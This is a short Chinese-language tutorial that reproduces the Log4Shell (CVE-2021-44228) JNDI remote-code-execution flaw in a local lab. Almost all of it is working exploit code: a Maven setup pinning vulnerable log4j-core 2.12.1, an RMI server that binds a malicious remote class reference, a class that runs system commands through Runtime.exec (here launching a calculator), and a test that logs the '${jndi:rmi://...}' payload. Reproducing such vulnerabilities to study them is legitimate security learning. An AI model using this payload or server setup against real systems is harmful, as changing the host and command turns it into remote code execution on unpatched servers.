介绍
参考:
# 从零到一带你深入 log4j2 Jndi RCE CVE-2021-44228漏洞
实现
添加maven依赖
<dependencies>
<dependency>
<groupId>org.apache.logging.log4j</groupId>
<artifactId>log4j-core</artifactId>
<version>2.12.1</version>
</dependency>
<dependency>
<groupId>junit</groupId>
<artifactId>junit</artifactId>
<version>4.13.2</version>
<scope>test</scope>
</dependency>
</dependencies>
启动一个RMI Server
/**
* Hello world!
*/
public class RmiServer {
public static void main(String[] args) throws Exception {
Reference reference = new Reference("org.example.hack.HackCommand", "org.example.hack.HackCommand", "http://localhost:8080/");
ReferenceWrapper referenceWrapper = new ReferenceWrapper(reference);
LocateRegistry.createRegistry(1099).bind("evil", referenceWrapper);
}
}
对应的HackCommand类
public class HackCommand {
public HackCommand() throws IOException {
Runtime rt = Runtime.getRuntime();
String property = System.getProperty("os.name");
if ("Mac OS X".equals(property)) {
String[] commands = {"/bin/sh", "-c", "open /System/Applications/Calculator.app"};
rt.exec(commands);
} else {
rt.exec("cmd /c calc");
}
}
}
写一个测试文件
public class Log4jTest {
private static final Logger logger = LogManager.getLogger();
@Test
public void test() {
System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase", "true");
String input = "${jndi:rmi://localhost:1099/evil}";
logger.error("log:{}", input);
}
}
